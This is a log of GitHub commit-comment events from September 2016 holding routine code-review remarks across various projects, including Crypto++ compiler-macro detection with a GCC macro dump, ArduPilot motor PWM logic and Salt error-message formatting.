{"id":"4584603416","type":"CommitCommentEvent","actor":{"login":"wsilva32"},"repo":{"name":"3drobotics/ardupilot-solo"},"payload":{"comment":{"id":19081917,"position":26,"line":208,"path":"libraries/AP_Motors/AP_MotorsMatrix.cpp","commit_id":"3348d492cf172951547ad6b2da382bbb771c42d1","created_at":"2016-09-19T17:13:23Z","updated_at":"2016-09-19T17:13:23Z","body":"Since PWM margin is `_hover_out - _min_throttle` and you want to make sure you're not adding any more than that difference to your `out_min_pwm` from your proportional feedforward controller at line 207."}},"created_at":"2016-09-19T17:13:23Z"}
{"id":"4584606564","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19081923,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:13:49Z","updated_at":"2016-09-19T17:13:49Z","body":"@leticiaquino 👀 "}},"created_at":"2016-09-19T17:13:49Z"}
{"id":"4584607591","type":"CommitCommentEvent","actor":{"login":"vsemkin"},"repo":{"name":"vsemkin/markdown_syndrome"},"payload":{"comment":{"id":19081925,"position":15,"line":13,"path":"README.md","commit_id":"24b31831309307d6e50d231728271f85c74818d9","created_at":"2016-09-19T17:13:59Z","updated_at":"2016-09-19T17:13:59Z","body":"4. html convert tp __textarea__"}},"created_at":"2016-09-19T17:13:59Z"}
{"id":"4584611786","type":"CommitCommentEvent","actor":{"login":"robertmclaws"},"repo":{"name":"developerforce/visual-studio-tools"},"payload":{"comment":{"id":19081936,"position":null,"line":null,"path":null,"commit_id":"34e73844ec8bb3241001cddec9a102a45d55d646","created_at":"2016-09-19T17:14:41Z","updated_at":"2016-09-19T17:14:41Z","body":"I am using this code in a production project, and specifically made this change because the shipping code is getting in the way of my desired project structure and implementation. Technically, your template execution code *should* be pulling the file extension from the <@output> directive I'm the template itself, so the end user can change it at will. But I am not familiar enough with the internals of Visual Studio's templating code to be able to locate that property.\r\n\r\nThe \"Can't touch this\" style of code generation, coupled with partial classes, is super important for development, especially if you are having to constantly refresh your files because your model is evolving. It kind of feels like, if you had used this plugin to ship a production -level app, you would have made some different choices... Like, for example, having the code look for the T4 customizations in the project itself where they can be checked in vs the user's Documents folder, where they can't."}},"created_at":"2016-09-19T17:14:41Z"}
{"id":"4584612233","type":"CommitCommentEvent","actor":{"login":"EmilyK"},"repo":{"name":"shaunvadaketh/blogful"},"payload":{"comment":{"id":19081937,"position":20,"line":88,"path":"blog/views.py","commit_id":"ca61a4b6ebc43bd4251472b72b4c85a95c77a221","created_at":"2016-09-19T17:14:45Z","updated_at":"2016-09-19T17:14:45Z","body":"@shaunvadaketh it's cleaner too have all your imports in one place(You could move these at the top)"}},"created_at":"2016-09-19T17:14:45Z"}
{"id":"4584618073","type":"CommitCommentEvent","actor":{"login":"Larcer"},"repo":{"name":"Larcer/Practice1"},"payload":{"comment":{"id":19081947,"position":null,"line":null,"path":null,"commit_id":"b217f310e55f8ebd3e5be5b431bd6dd815437bfe","created_at":"2016-09-19T17:15:43Z","updated_at":"2016-09-19T17:15:43Z","body":"..."}},"created_at":"2016-09-19T17:15:43Z"}
{"id":"4584619188","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19081949,"position":9,"line":9,"path":"src/BenchmarkDotNet.Core/Attributes/Jobs/SimpleJobAttribute.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:15:54Z","updated_at":"2016-09-19T17:15:54Z","body":"personally I would use `const int DefaultValue = -1`"}},"created_at":"2016-09-19T17:15:54Z"}
{"id":"4584621780","type":"CommitCommentEvent","actor":{"login":"WindyDarian"},"repo":{"name":"stormouse/learn-to-server"},"payload":{"comment":{"id":19081955,"position":null,"line":null,"path":null,"commit_id":"b4b50d14a9f016f99faf6f05460aa0fe744fba6e","created_at":"2016-09-19T17:16:19Z","updated_at":"2016-09-19T17:16:19Z","body":"围观！"}},"created_at":"2016-09-19T17:16:19Z"}
{"id":"4584623446","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19081959,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:16:35Z","updated_at":"2016-09-19T17:16:35Z","body":"Você tem razão!!!\r\nAqui na JATS a ordem é: ```<label>```e depois ```<title>```.\r\n:cold_sweat:"}},"created_at":"2016-09-19T17:16:35Z"}
{"id":"4584624127","type":"CommitCommentEvent","actor":{"login":"ihor-sviziev"},"repo":{"name":"ven-com/Magento-PageCache-powered-by-Varnish"},"payload":{"comment":{"id":19081961,"position":8,"line":194,"path":"app/code/community/Phoenix/VarnishCache/etc/default_3.0.vcl","commit_id":"b476250a35b5daf96c4b5287d6d7e0105d508e91","created_at":"2016-09-19T17:16:43Z","updated_at":"2016-09-19T17:16:43Z","body":"Sorry, my mistake"}},"created_at":"2016-09-19T17:16:43Z"}
{"id":"4584624536","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19081963,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:16:47Z","updated_at":"2016-09-19T17:16:47Z","body":"http://jats.nlm.nih.gov/publishing/tag-library/1.0/n-yf70.html\r\n"}},"created_at":"2016-09-19T17:16:47Z"}
{"id":"4584625880","type":"CommitCommentEvent","actor":{"login":"kytrinyx"},"repo":{"name":"exercism/xjava"},"payload":{"comment":{"id":19081965,"position":null,"line":null,"path":null,"commit_id":"37721c40bf71dd71929a6a0a133c2263b45b0768","created_at":"2016-09-19T17:17:00Z","updated_at":"2016-09-19T17:17:00Z","body":"@jtigger I've just deployed. I need to find a better way to stay on top of deploys."}},"created_at":"2016-09-19T17:17:00Z"}
{"id":"4584626480","type":"CommitCommentEvent","actor":{"login":"kaschioudi"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19081967,"position":null,"line":null,"path":null,"commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:17:07Z","updated_at":"2016-09-19T17:17:07Z","body":"@asmecher"}},"created_at":"2016-09-19T17:17:07Z"}
{"id":"4584626806","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19081969,"position":null,"line":null,"path":null,"commit_id":"714daaf5706e9e2b196beb5446cc4f53d1652c75","created_at":"2016-09-19T17:17:10Z","updated_at":"2016-09-19T17:17:10Z","body":"> Unfortunately this will break other libraries (for example some Boost libraries) which rely on clang defining __GNUC__ in GCC mode if crypto++ headers are included before them.\r\n\r\nI believe the proper way to check for `libstdc++` is to check for `__GLIBCPP__` (GCC 3.4.0 and earlier) or  `__GLIBCXX__` (modern GCC) after including a C++ header. Also see GCC's [ABI Policy and Guidelines](http://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html).\r\n\r\n```\r\n$  cat test.cxx\r\n#include <iosfwd>\r\nint main (int argc, char* argv[])\r\n{\r\n  return 0;\r\n}\r\n```\r\n\r\nAnd:\r\n\r\n```\r\n$ g++ -dM -E test.cxx | egrep '(GXX|GLIBCXX)' | sort\r\n#define __GLIBCXX__ 20150426\r\n#define _GLIBCXX_ABI_TAG_CXX11 __attribute ((__abi_tag__ (\"cxx11\")))\r\n#define _GLIBCXX_ATOMIC_BUILTINS 1\r\n#define _GLIBCXX_BEGIN_EXTERN_C extern \"C\" {\r\n#define _GLIBCXX_BEGIN_NAMESPACE_ALGO \r\n#define _GLIBCXX_BEGIN_NAMESPACE_CONTAINER \r\n#define _GLIBCXX_BEGIN_NAMESPACE_LDBL \r\n#define _GLIBCXX_BEGIN_NAMESPACE_VERSION \r\n#define _GLIBCXX_CONST __attribute__ ((__const__))\r\n#define _GLIBCXX_CONSTEXPR \r\n#define _GLIBCXX_CPU_DEFINES 1\r\n#define _GLIBCXX_CWCHAR 1\r\n#define _GLIBCXX_CXX_CONFIG_H 1\r\n#define _GLIBCXX_DEPRECATED \r\n#define _GLIBCXX_END_EXTERN_C }\r\n#define _GLIBCXX_END_NAMESPACE_ALGO \r\n#define _GLIBCXX_END_NAMESPACE_CONTAINER \r\n#define _GLIBCXX_END_NAMESPACE_LDBL \r\n#define _GLIBCXX_END_NAMESPACE_VERSION \r\n#define _GLIBCXX_EXTERN_TEMPLATE 1\r\n#define _GLIBCXX_FAST_MATH 0\r\n#define _GLIBCXX_FULLY_DYNAMIC_STRING 0\r\n#define _GLIBCXX_HAS_GTHREADS 1\r\n#define _GLIBCXX_HAVE_ACOSF 1\r\n#define _GLIBCXX_HAVE_ACOSL 1\r\n#define _GLIBCXX_HAVE_ASINF 1\r\n#define _GLIBCXX_HAVE_ASINL 1\r\n#define _GLIBCXX_HAVE_AS_SYMVER_DIRECTIVE 1\r\n#define _GLIBCXX_HAVE_ATAN2F 1\r\n#define _GLIBCXX_HAVE_ATAN2L 1\r\n#define _GLIBCXX_HAVE_ATANF 1\r\n#define _GLIBCXX_HAVE_ATANL 1\r\n#define _GLIBCXX_HAVE_AT_QUICK_EXIT 1\r\n#define _GLIBCXX_HAVE_ATTRIBUTE_VISIBILITY 1\r\n#define _GLIBCXX_HAVE_CEILF 1\r\n#define _GLIBCXX_HAVE_CEILL 1\r\n#define _GLIBCXX_HAVE_COMPLEX_H 1\r\n#define _GLIBCXX_HAVE_COSF 1\r\n#define _GLIBCXX_HAVE_COSHF 1\r\n#define _GLIBCXX_HAVE_COSHL 1\r\n#define _GLIBCXX_HAVE_COSL 1\r\n#define _GLIBCXX_HAVE___CXA_THREAD_ATEXIT_IMPL 1\r\n#define _GLIBCXX_HAVE_DLFCN_H 1\r\n#define _GLIBCXX_HAVE_EBADMSG 1\r\n#define _GLIBCXX_HAVE_ECANCELED 1\r\n#define _GLIBCXX_HAVE_ECHILD 1\r\n#define _GLIBCXX_HAVE_EIDRM 1\r\n#define _GLIBCXX_HAVE_ENDIAN_H 1\r\n#define _GLIBCXX_HAVE_ENODATA 1\r\n#define _GLIBCXX_HAVE_ENOLINK 1\r\n#define _GLIBCXX_HAVE_ENOSPC 1\r\n#define _GLIBCXX_HAVE_ENOSR 1\r\n#define _GLIBCXX_HAVE_ENOSTR 1\r\n#define _GLIBCXX_HAVE_ENOTRECOVERABLE 1\r\n#define _GLIBCXX_HAVE_ENOTSUP 1\r\n#define _GLIBCXX_HAVE_EOVERFLOW 1\r\n#define _GLIBCXX_HAVE_EOWNERDEAD 1\r\n#define _GLIBCXX_HAVE_EPERM 1\r\n#define _GLIBCXX_HAVE_EPROTO 1\r\n#define _GLIBCXX_HAVE_ETIME 1\r\n#define _GLIBCXX_HAVE_ETIMEDOUT 1\r\n#define _GLIBCXX_HAVE_ETXTBSY 1\r\n#define _GLIBCXX_HAVE_EWOULDBLOCK 1\r\n#define _GLIBCXX_HAVE_EXECINFO_H 1\r\n#define _GLIBCXX_HAVE_EXPF 1\r\n#define _GLIBCXX_HAVE_EXPL 1\r\n#define _GLIBCXX_HAVE_FABSF 1\r\n#define _GLIBCXX_HAVE_FABSL 1\r\n#define _GLIBCXX_HAVE_FENV_H 1\r\n#define _GLIBCXX_HAVE_FINITE 1\r\n#define _GLIBCXX_HAVE_FINITEF 1\r\n#define _GLIBCXX_HAVE_FINITEL 1\r\n#define _GLIBCXX_HAVE_FLOAT_H 1\r\n#define _GLIBCXX_HAVE_FLOORF 1\r\n#define _GLIBCXX_HAVE_FLOORL 1\r\n#define _GLIBCXX_HAVE_FMODF 1\r\n#define _GLIBCXX_HAVE_FMODL 1\r\n#define _GLIBCXX_HAVE_FREXPF 1\r\n#define _GLIBCXX_HAVE_FREXPL 1\r\n#define _GLIBCXX_HAVE_GETIPINFO 1\r\n#define _GLIBCXX_HAVE_GETS 1\r\n#define _GLIBCXX_HAVE_HYPOT 1\r\n#define _GLIBCXX_HAVE_HYPOTF 1\r\n#define _GLIBCXX_HAVE_HYPOTL 1\r\n#define _GLIBCXX_HAVE_ICONV 1\r\n#define _GLIBCXX_HAVE_INT64_T 1\r\n#define _GLIBCXX_HAVE_INT64_T_LONG 1\r\n#define _GLIBCXX_HAVE_INTTYPES_H 1\r\n#define _GLIBCXX_HAVE_ISINF 1\r\n#define _GLIBCXX_HAVE_ISINFF 1\r\n#define _GLIBCXX_HAVE_ISINFL 1\r\n#define _GLIBCXX_HAVE_ISNAN 1\r\n#define _GLIBCXX_HAVE_ISNANF 1\r\n#define _GLIBCXX_HAVE_ISNANL 1\r\n#define _GLIBCXX_HAVE_ISWBLANK 1\r\n#define _GLIBCXX_HAVE_LC_MESSAGES 1\r\n#define _GLIBCXX_HAVE_LDEXPF 1\r\n#define _GLIBCXX_HAVE_LDEXPL 1\r\n#define _GLIBCXX_HAVE_LIBINTL_H 1\r\n#define _GLIBCXX_HAVE_LIMIT_AS 1\r\n#define _GLIBCXX_HAVE_LIMIT_DATA 1\r\n#define _GLIBCXX_HAVE_LIMIT_FSIZE 1\r\n#define _GLIBCXX_HAVE_LIMIT_RSS 1\r\n#define _GLIBCXX_HAVE_LIMIT_VMEM 0\r\n#define _GLIBCXX_HAVE_LINUX_FUTEX 1\r\n#define _GLIBCXX_HAVE_LOCALE_H 1\r\n#define _GLIBCXX_HAVE_LOG10F 1\r\n#define _GLIBCXX_HAVE_LOG10L 1\r\n#define _GLIBCXX_HAVE_LOGF 1\r\n#define _GLIBCXX_HAVE_LOGL 1\r\n#define _GLIBCXX_HAVE_MBSTATE_T 1\r\n#define _GLIBCXX_HAVE_MEMORY_H 1\r\n#define _GLIBCXX_HAVE_MODF 1\r\n#define _GLIBCXX_HAVE_MODFF 1\r\n#define _GLIBCXX_HAVE_MODFL 1\r\n#define _GLIBCXX_HAVE_POLL 1\r\n#define _GLIBCXX_HAVE_POWF 1\r\n#define _GLIBCXX_HAVE_POWL 1\r\n#define _GLIBCXX_HAVE_QUICK_EXIT 1\r\n#define _GLIBCXX_HAVE_SETENV 1\r\n#define _GLIBCXX_HAVE_SINCOS 1\r\n#define _GLIBCXX_HAVE_SINCOSF 1\r\n#define _GLIBCXX_HAVE_SINCOSL 1\r\n#define _GLIBCXX_HAVE_SINF 1\r\n#define _GLIBCXX_HAVE_SINHF 1\r\n#define _GLIBCXX_HAVE_SINHL 1\r\n#define _GLIBCXX_HAVE_SINL 1\r\n#define _GLIBCXX_HAVE_S_ISREG 1\r\n#define _GLIBCXX_HAVE_SQRTF 1\r\n#define _GLIBCXX_HAVE_SQRTL 1\r\n#define _GLIBCXX_HAVE_STDALIGN_H 1\r\n#define _GLIBCXX_HAVE_STDBOOL_H 1\r\n#define _GLIBCXX_HAVE_STDINT_H 1\r\n#define _GLIBCXX_HAVE_STDLIB_H 1\r\n#define _GLIBCXX_HAVE_STRERROR_L 1\r\n#define _GLIBCXX_HAVE_STRERROR_R 1\r\n#define _GLIBCXX_HAVE_STRING_H 1\r\n#define _GLIBCXX_HAVE_STRINGS_H 1\r\n#define _GLIBCXX_HAVE_STRTOF 1\r\n#define _GLIBCXX_HAVE_STRTOLD 1\r\n#define _GLIBCXX_HAVE_STRXFRM_L 1\r\n#define _GLIBCXX_HAVE_SYMVER_SYMBOL_RENAMING_RUNTIME_SUPPORT 1\r\n#define _GLIBCXX_HAVE_SYS_IOCTL_H 1\r\n#define _GLIBCXX_HAVE_SYS_IPC_H 1\r\n#define _GLIBCXX_HAVE_SYS_PARAM_H 1\r\n#define _GLIBCXX_HAVE_SYS_RESOURCE_H 1\r\n#define _GLIBCXX_HAVE_SYS_SEM_H 1\r\n#define _GLIBCXX_HAVE_SYS_STAT_H 1\r\n#define _GLIBCXX_HAVE_SYS_SYSINFO_H 1\r\n#define _GLIBCXX_HAVE_SYS_TIME_H 1\r\n#define _GLIBCXX_HAVE_SYS_TYPES_H 1\r\n#define _GLIBCXX_HAVE_SYS_UIO_H 1\r\n#define _GLIBCXX_HAVE_TANF 1\r\n#define _GLIBCXX_HAVE_TANHF 1\r\n#define _GLIBCXX_HAVE_TANHL 1\r\n#define _GLIBCXX_HAVE_TANL 1\r\n#define _GLIBCXX_HAVE_TGMATH_H 1\r\n#define _GLIBCXX_HAVE_TLS 1\r\n#define _GLIBCXX_HAVE_UNISTD_H 1\r\n#define _GLIBCXX_HAVE_VFWSCANF 1\r\n#define _GLIBCXX_HAVE_VSWSCANF 1\r\n#define _GLIBCXX_HAVE_VWSCANF 1\r\n#define _GLIBCXX_HAVE_WCHAR_H 1\r\n#define _GLIBCXX_HAVE_WCSTOF 1\r\n#define _GLIBCXX_HAVE_WCTYPE_H 1\r\n#define _GLIBCXX_HAVE_WRITEV 1\r\n#define _GLIBCXX_HOSTED 1\r\n#define _GLIBCXX_ICONV_CONST \r\n#define _GLIBCXX_INLINE_VERSION 0\r\n#define _GLIBCXX_IOSFWD 1\r\n#define _GLIBCXX_NAMESPACE_LDBL \r\n#define _GLIBCXX_NOEXCEPT \r\n#define _GLIBCXX_NORETURN __attribute__ ((__noreturn__))\r\n#define _GLIBCXX_NOTHROW _GLIBCXX_USE_NOEXCEPT\r\n#define _GLIBCXX_OS_DEFINES 1\r\n#define _GLIBCXX_PACKAGE_BUGREPORT \"\"\r\n#define _GLIBCXX_PACKAGE__GLIBCXX_VERSION \"version-unused\"\r\n#define _GLIBCXX_PACKAGE_NAME \"package-unused\"\r\n#define _GLIBCXX_PACKAGE_STRING \"package-unused version-unused\"\r\n#define _GLIBCXX_PACKAGE_TARNAME \"libstdc++\"\r\n#define _GLIBCXX_PACKAGE_URL \"\"\r\n#define _GLIBCXX_POSTYPES_H 1\r\n#define _GLIBCXX_PSEUDO_VISIBILITY(V) \r\n#define _GLIBCXX_PURE __attribute__ ((__pure__))\r\n#define _GLIBCXX_RES_LIMITS 1\r\n#define _GLIBCXX_STD_A std\r\n#define _GLIBCXX_STD_C std\r\n#define _GLIBCXX_STDIO_EOF -1\r\n#define _GLIBCXX_STDIO_SEEK_CUR 1\r\n#define _GLIBCXX_STDIO_SEEK_END 2\r\n#define _GLIBCXX_SYMVER 1\r\n#define _GLIBCXX_SYMVER_GNU 1\r\n#define _GLIBCXX_SYNCHRONIZATION_HAPPENS_AFTER(A) \r\n#define _GLIBCXX_SYNCHRONIZATION_HAPPENS_BEFORE(A) \r\n#define _GLIBCXX_THROW(_EXC) throw(_EXC)\r\n#define _GLIBCXX_THROW_OR_ABORT(_EXC) (throw (_EXC))\r\n#define _GLIBCXX_USE_C99 1\r\n#define _GLIBCXX_USE_C99_COMPLEX 1\r\n#define _GLIBCXX_USE_C99_COMPLEX_TR1 1\r\n#define _GLIBCXX_USE_C99_CTYPE_TR1 1\r\n#define _GLIBCXX_USE_C99_FENV_TR1 1\r\n#define _GLIBCXX_USE_C99_INTTYPES_TR1 1\r\n#define _GLIBCXX_USE_C99_INTTYPES_WCHAR_T_TR1 1\r\n#define _GLIBCXX_USE_C99_MATH 1\r\n#define _GLIBCXX_USE_C99_MATH_TR1 1\r\n#define _GLIBCXX_USE_C99_STDINT_TR1 1\r\n#define _GLIBCXX_USE_CLOCK_MONOTONIC 1\r\n#define _GLIBCXX_USE_CLOCK_REALTIME 1\r\n#define _GLIBCXX_USE_CONSTEXPR const\r\n#define _GLIBCXX_USE_DECIMAL_FLOAT 1\r\n#define _GLIBCXX_USE_DEPRECATED 1\r\n#define _GLIBCXX_USE_FLOAT128 1\r\n#define _GLIBCXX_USE_GET_NPROCS 1\r\n#define _GLIBCXX_USE_GETTIMEOFDAY 1\r\n#define _GLIBCXX_USE_INT128 1\r\n#define _GLIBCXX_USE_LFS 1\r\n#define _GLIBCXX_USE_LONG_LONG 1\r\n#define _GLIBCXX_USE_NANOSLEEP 1\r\n#define _GLIBCXX_USE_NLS 1\r\n#define _GLIBCXX_USE_NOEXCEPT throw()\r\n#define _GLIBCXX_USE_RANDOM_TR1 1\r\n#define _GLIBCXX_USE_SCHED_YIELD 1\r\n#define _GLIBCXX_USE_SC_NPROCESSORS_ONLN 1\r\n#define _GLIBCXX_USE_WCHAR_T 1\r\n#define _GLIBCXX_VERBOSE 1\r\n#define _GLIBCXX_VISIBILITY(V) __attribute__ ((__visibility__ (#V)))\r\n#define _GLIBCXX_WEAK_DEFINITION \r\n#define _GLIBCXX_X86_RDRAND 1\r\n#define __GXX_ABI_VERSION 1002\r\n#define __GXX_RTTI 1\r\n#define __GXX_WEAK__ 1\r\n```"}},"created_at":"2016-09-19T17:17:10Z"}
{"id":"4584626875","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19081970,"position":null,"line":null,"path":null,"commit_id":"a212340cc1c7922b17c9ed35c01ea8bef05a9e9d","created_at":"2016-09-19T17:17:11Z","updated_at":"2016-09-19T17:17:11Z","body":"@jawshooah Apologies, that happened because a previous install attempt didn't overwrite the existing file."}},"created_at":"2016-09-19T17:17:11Z"}
{"id":"4584627792","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19081971,"position":null,"line":null,"path":null,"commit_id":"1abbd1d39dcc194a4206cd6150799acad97f608e","created_at":"2016-09-19T17:17:20Z","updated_at":"2016-09-19T17:17:20Z","body":"Around lines 720 you have change the error messages\r\nlog.error(msg)\r\nerrors.append(msg)\r\nThese message were deliberately different because `within \"{2}\"` is not required text within `errors.append(msg)`  because errors list is under dict which the key is the filename i.e. {2}\r\n\r\nThe orginal ouput\r\n```\r\nC:\\salt>salt-call pkg.refresh_db\r\n[ERROR   ] pkgname \"dvschedulerX\" version \"1\" within \"dvscheduler2.sls\", \"version number\" is not a string\r\n[ERROR   ] pkgname \"dvschedulerX\" version \"2\" within \"dvscheduler2.sls\", \"version number\" is not a string\r\n[ERROR   ] failed to compile \"salt-winrepo-ng\\check-mk-agent.sls\", check syntax, Conflicting ID 'Not Found'\r\n[ERROR   ] pkgname \"duplicati\" version \"skip_urltest\" within \"salt-winrepo-ng\\duplicati.sls\", \"version number\" is not defined as dictionary(hash) key\r\n[ERROR   ] failed to compile \"salt-winrepo-ng\\intellij.sls\", check syntax, Conflicting ID '1'\r\nError running 'pkg.refresh_db': Error occurred while generating repo db. Additional info follows:\r\n\r\nfailed:\r\n    4\r\nfailed_list:\r\n    ----------\r\n    dvscheduler2.sls:\r\n        - pkgname \"dvschedulerX\", version \"1\" is not a string\r\n        - pkgname \"dvschedulerX\", version \"2\" is not a string\r\n    salt-winrepo-ng\\check-mk-agent.sls:\r\n        - failed to compile, check syntax, Conflicting ID 'Not Found'\r\n    salt-winrepo-ng\\duplicati.sls:\r\n        - pkgname \"duplicati\", version \"skip_urltest\" is not defined as a dictionary(hash) key\r\n    salt-winrepo-ng\\intellij.sls:\r\n        - failed to compile, check syntax, Conflicting ID '1'\r\nsuccess:\r\n    228\r\ntotal:\r\n    232\r\n```\r\n Note the data structure return as the filename as a dict key, so no need to repeat it in the error message\r\n\r\nNew version from my reading of the code as the file name twice:\r\n```\r\nC:\\salt>salt-call pkg.refresh_db\r\n[ERROR   ] pkgname \"dvschedulerX\" version \"1\" within \"dvscheduler2.sls\", \"version number\" is not a string\r\n[ERROR   ] pkgname \"dvschedulerX\" version \"2\" within \"dvscheduler2.sls\", \"version number\" is not a string\r\n[ERROR   ] failed to compile \"salt-winrepo-ng\\check-mk-agent.sls\", check syntax, Conflicting ID 'Not Found'\r\n[ERROR   ] pkgname \"duplicati\" version \"skip_urltest\" within \"salt-winrepo-ng\\duplicati.sls\", \"version number\" is not defined as dictionary(hash) key\r\n[ERROR   ] failed to compile \"salt-winrepo-ng\\intellij.sls\", check syntax, Conflicting ID '1'\r\nError running 'pkg.refresh_db': Error occurred while generating repo db. Additional info follows:\r\n\r\nfailed:\r\n    4\r\nfailed_list:\r\n    ----------\r\n    dvscheduler2.sls:\r\n        - pkgname \"dvschedulerX\" version \"1\" within \"dvscheduler2.sls\", \"version number\" is not a string\r\n        - pkgname \"dvschedulerX\" version \"2\" within \"dvscheduler2.sls\", \"version number\" is not a string\r\n    salt-winrepo-ng\\check-mk-agent.sls:\r\n        - failed to compile \"salt-winrepo-ng\\check-mk-agent.sls\", check syntax, Conflicting ID 'Not Found'\r\n    salt-winrepo-ng\\duplicati.sls:\r\n        - pkgname \"duplicati\" version \"skip_urltest\" within \"salt-winrepo-ng\\duplicati.sls\", \"version number\" is not defined as dictionary(hash) key\r\n    salt-winrepo-ng\\intellij.sls:\r\n        - failed to compile \"salt-winrepo-ng\\intellij.sls\", check syntax, Conflicting ID '1'\r\nsuccess:\r\n    228\r\ntotal:\r\n    232\r\n```\r\n\r\nI have not looked over the other bits of the code yet."}},"created_at":"2016-09-19T17:17:20Z"}
{"id":"4584641358","type":"CommitCommentEvent","actor":{"login":"andriidudar"},"repo":{"name":"laym/UI_template"},"payload":{"comment":{"id":19082002,"position":4,"line":89,"path":"systematic/index.html","commit_id":"4784562cca01e20d8a433589a801defbfa585af9","created_at":"2016-09-19T17:19:27Z","updated_at":"2016-09-19T17:19:27Z","body":"Good job! Approve"}},"created_at":"2016-09-19T17:19:27Z"}
{"id":"4584644756","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19082005,"position":null,"line":null,"path":null,"commit_id":"714daaf5706e9e2b196beb5446cc4f53d1652c75","created_at":"2016-09-19T17:19:56Z","updated_at":"2016-09-19T17:19:56Z","body":"But I get what you are saying... LLVM's `libc++` claims Clang is not a supported compiler (bug report filed at [Issue 30446: Undefining __GNUC__ or setting __GNUC__ to 1 breaks libc++](http://llvm.org/bugs/show_bug.cgi?id=30446)):\r\n\r\n```\r\n$ cat test.cxx \r\n#if defined(__GNUC__) && defined(__clang__)\r\n# undef __GNUC__\r\n# undef __GNUC_MINOR__\r\n# undef __GNUC_PATCHLEVEL__\r\n# define __GNUC__ 1\r\n#endif\r\n\r\n#include <string>\r\nint main(int argc, char* argv[])\r\n{\r\n  return 0;\r\n}\r\nriemann:cryptopp$ c++ -DNDEBUG -g2 -O2 -stdlib=libc++ test.cxx -o test.exe\r\nIn file included from test.cxx:8:\r\nIn file included from /usr/bin/../lib/c++/v1/string:435:\r\nIn file included from /usr/bin/../lib/c++/v1/iosfwd:90:\r\nIn file included from /usr/include/wchar.h:70:\r\nIn file included from /usr/include/_types.h:27:\r\nIn file included from /usr/include/sys/_types.h:32:\r\n/usr/include/sys/cdefs.h:81:2: warning: \"Unsupported compiler detected\"\r\n      [-W#warnings]\r\n#warning \"Unsupported compiler detected\"\r\n ^\r\n1 warning generated.\r\n```"}},"created_at":"2016-09-19T17:19:56Z"}
{"id":"4584646826","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19082011,"position":null,"line":null,"path":null,"commit_id":"f30c9499b62e4959d8265b1e22401702f073aa15","created_at":"2016-09-19T17:20:17Z","updated_at":"2016-09-19T17:20:17Z","body":"@nanosoldier `runbenchmarks(ALL, vs=\"@e781d08180a96519e84793e872c96e095df95c79\")`\r\n\r\ne781d08180a96519e84793e872c96e095df95c79\r\n"}},"created_at":"2016-09-19T17:20:17Z"}
{"id":"4584649263","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19082017,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:20:42Z","updated_at":"2016-09-19T17:20:42Z","body":"suspeito que esse pequeno detalhe faça toda a diferença e mele a proposta"}},"created_at":"2016-09-19T17:20:42Z"}
{"id":"4584654344","type":"CommitCommentEvent","actor":{"login":"tobeycarman"},"repo":{"name":"rarutter/dvm-dos-tem"},"payload":{"comment":{"id":19082024,"position":null,"line":null,"path":null,"commit_id":"64e03b9132778140ddbcc1da296a9c9eb7a85be4","created_at":"2016-09-19T17:21:30Z","updated_at":"2016-09-19T17:21:30Z","body":"I think this is ready for a PR and merge. I think I used it in a 'throwaway' integration branch when doing my last PEST run, so I believe it is at least partly tested."}},"created_at":"2016-09-19T17:21:30Z"}
{"id":"4584657394","type":"CommitCommentEvent","actor":{"login":"thecristen"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19082029,"position":null,"line":null,"path":null,"commit_id":"ff21c5e6b5edefab0741c0e4ee439012943adb72","created_at":"2016-09-19T17:21:59Z","updated_at":"2016-09-19T17:21:59Z","body":"The changes in this commit produce this view (note link on upper right):\r\n\r\n### Default\r\n\r\n![image](https://cloud.githubusercontent.com/assets/2136286/18641738/e7221370-7e6b-11e6-986d-697fd386d871.png)\r\n\r\n### 508 page\r\n\r\n![image](https://cloud.githubusercontent.com/assets/2136286/18641743/efc70724-7e6b-11e6-83df-4b7709a3068b.png)\r\n\r\n"}},"created_at":"2016-09-19T17:21:59Z"}
{"id":"4584661178","type":"CommitCommentEvent","actor":{"login":"DDoS"},"repo":{"name":"michael-golfi/rules"},"payload":{"comment":{"id":19082034,"position":null,"line":null,"path":null,"commit_id":"2b4b044ffc2769e7a3695ebc5c18ac719d11ca37","created_at":"2016-09-19T17:22:36Z","updated_at":"2016-09-19T17:22:36Z","body":"Are you actually comparing the test results to data or just printing out the result for manual verification? Because that's not really testing..."}},"created_at":"2016-09-19T17:22:36Z"}
